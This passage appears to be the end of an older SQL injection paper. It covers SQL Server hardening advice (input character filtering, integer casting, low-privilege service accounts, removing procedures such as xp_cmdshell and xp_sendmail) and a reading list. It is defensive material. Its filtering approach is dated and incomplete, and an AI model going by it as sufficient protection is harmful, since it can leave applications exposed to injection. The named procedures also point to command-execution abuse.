Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

Great article on gathering information from ODBC error messages:
http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

A good summary of SQL Injection on various SQL Server on
http://www.owasp.org/asac/input_validation/sql.shtml

Senseport's article on reading SQL Injection:
http://www.sensepost.com/misc/SQLinsertion.htm

Other worth readings:
http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf